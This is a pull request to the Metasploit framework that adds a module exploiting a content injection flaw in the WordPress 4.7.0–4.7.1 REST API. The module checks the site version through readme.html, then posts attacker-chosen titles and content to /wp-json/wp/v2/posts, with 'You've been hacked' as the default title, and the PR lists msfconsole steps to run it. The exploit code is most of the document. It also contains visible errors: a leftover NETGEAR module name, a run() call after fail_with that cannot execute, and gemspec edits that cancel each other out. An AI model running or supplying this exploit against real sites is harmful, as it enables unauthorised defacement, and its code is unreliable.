### PR TITLE
Add WordPress content injection Auxiliary module

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -33,6 +33,7 @@ PATH
       rb-readline
       recog
       redcarpet
+      rest-client
       rex-arch (= 0.1.4)
       rex-bin_tools
       rex-core

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -23,7 +23,9 @@ Gem::Specification.new do |spec|
   spec.description   = 'metasploit-framework'
   spec.homepage      = 'https://www.metasploit.com'
   spec.license       = 'BSD-3-clause'
-
+  spec.files         = `git ls-files`.split($/).reject { |file|		
+    file =~ /^documentation|^data\/gui|^external/		
+  }
   spec.bindir = '.'
   if ENV['CREATE_BINSTUBS']
     spec.executables   = [

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -24,9 +24,6 @@ Gem::Specification.new do |spec|
   spec.homepage      = 'https://www.metasploit.com'
   spec.license       = 'BSD-3-clause'
 
-  spec.files         = `git ls-files`.split($/).reject { |file|
-    file =~ /^documentation|^data\/gui|^external/
-  }
   spec.bindir = '.'
   if ENV['CREATE_BINSTUBS']
     spec.executables   = [
@@ -41,6 +38,8 @@ Gem::Specification.new do |spec|
   spec.test_files    = spec.files.grep(%r{^spec/})
   spec.require_paths = ["lib"]
 
+  # REST support
+  spec.add_runtime_dependency 'rest-client'
   # Database support
   spec.add_runtime_dependency 'activerecord', *Metasploit::Framework::RailsVersionConstraint::RAILS_VERSION
   # Need 3+ for ActiveSupport::Concern

--- a/modules/auxiliary/admin/http/wp_content_injection.rb
+++ b/modules/auxiliary/admin/http/wp_content_injection.rb
@@ -1,0 +1,91 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rest-client'
+require 'json'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'NETGEAR Administrator Password Disclosure',
+      'Description'    => %q{
+        This module exploits a content injection flaw in WordPress versions 
+        4.7.0 and 4.7.1 only. This module will make a new customizable post
+        in index.php?p=POSTID.
+      },
+      'Author'         =>
+        [
+          'Harsh Jaiswal', # Vuln Discovery, PoC
+          'thecarterb'   # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html'],
+          [ 'EDB', '41224']
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+    [
+      OptString::new('POSTID', [true, 'The id of the new post', nil]),
+      OptString::new('TITLE', [true, 'Title of the new post', 'You\'ve been hacked']),
+      OptString::new('CONTENT', [true, 'Content of the new post', 'Update your wordpress version']),
+      Opt::RPORT(80)
+    ], self.class)
+  end
+
+  def check
+    vprint_status("Requesting #{rhost}/readme.html for version check")
+    res = send_request_cgi({'uri' => '/readme.html'})
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while determining WP verion, running module anyway.')
+      run
+    end
+    
+    html = res.to_s
+    start_trig = "<br /> "
+    end_trig = "</h1>"
+    version = html[/#{start_trig}(.*?)#{end_trig}/m, 1]
+    if version == "Version 4.7.0" || version == "Version 4.7.1"
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def run
+    id = datastore['POSTID']
+    title = datastore['TITLE']
+    content = datastore['CONTENT']
+    rhost = datastore['RHOST']
+    
+    version = check
+    if version == Exploit::CheckCode::Safe
+      print_error("#{rhost} is not vulnerable.")
+      return
+    end
+    response = RestClient.post(
+    "#{rhost}/index.php/wp-json/wp/v2/posts/#{id}",
+    {
+        "id"      =>  "#{id}",
+        "title"   =>  "#{title}",
+        "content" =>  "#{content}" 
+    }.to_json,
+    :content_type => :json,
+    :accept       => :json
+    ) {|response, request, result| response}
+    if response.code == 200
+      print_good("Done! #{rhost}/index.php?p=#{id}")
+    else
+      print_error("Website not vulnerable")
+    end
+  end  
+end


### PR DESCRIPTION
This module exploits a content injection bug in the REST API of WordPress versions 4.7.0 and 4.7.1 by adding a new post on the target website. The new post is customizable by changing POSTID, CONTENT, and TITLE respectively. The module fingerprints the WP version by parsing the `/readme.html` file and getting the version. If the file is not found, the module will run anyway.  This PR also adds `rest-client` to the Gemfile.lock and metasploit-framework.gemspec files.

## Verification

- [ ] Start `msfconsole`
- [ ] `use auxiliary/admin/http/wp_content_injection`
- [ ] `set POSTID 31337`
- [ ] `set TITLE Example Title`
- [ ] `set CONTENT Update WP`
- [ ] `set RHOST www.examplewpsite.com`

#### References

https://www.exploit-db.com/exploits/41224/
https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
